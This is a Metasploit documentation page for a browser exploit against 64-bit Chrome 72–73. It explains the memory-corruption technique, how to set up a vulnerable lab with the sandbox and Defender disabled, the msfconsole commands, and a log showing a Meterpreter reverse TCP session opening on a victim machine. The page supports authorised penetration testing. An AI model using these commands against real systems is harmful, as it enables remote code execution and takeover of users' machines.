Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/browser/chrome_array_map.md
19934 views

This module exploits an issue in Chrome 73.0.3683.86 (64 bit). The exploit corrupts the length of a float in order to modify the backing store of a typed array. The typed array can then be used to read and write arbitrary memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload.

The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.

Vulnerable Application

The module is compatible with any 64bit Google Chrome (version 72 or 73), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.

Vulnerable Application Installation Steps

You can download a vulnerable Chrome version from this location: https://www.filepuma.com/download/google_chrome_64bit_73.0.3683.86-21785/

You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet). You may also need to disable Windows Defender.

Verification Steps

  1. Do: use exploit/multi/browser/chrome_array_map

  2. Do: set payload windows/x64/meterpreter/reverse_tcp

  3. Do: set LHOST [IP]

  4. Do: set SRVHOST [IP]

  5. Do: set URIPATH / [PATH]

  6. Do: run

Scenarios

Windows 10 and Google Chrome 73.0.3683.86 with --no-sandbox

Start Google Chrome without a sandbox: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox

msf > use exploit/multi/browser/chrome_array_map msf exploit(multi/browser/chrome_array_map) > set SRVHOST 192.168.56.1 SRVHOST => 192.168.56.1 msf exploit(multi/browser/chrome_array_map) > set URIPATH / URIPATH => / msf exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(multi/browser/chrome_array_map) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 msf exploit(multi/browser/chrome_array_map) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf exploit(multi/browser/chrome_array_map) > [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Using URL: http://192.168.56.1:8080/ [*] Server started. [*] 192.168.56.3 chrome_array_map - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 [*] Sending stage (206403 bytes) to 192.168.56.3 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49675) at 2020-02-29 15:07:06 +0800 msf exploit(multi/browser/chrome_array_map) > sessions 1 [*] Starting interaction with 1... meterpreter > pwd C:\Program Files (x86)\Google\Chrome\Application\73.0.3683.86 meterpreter >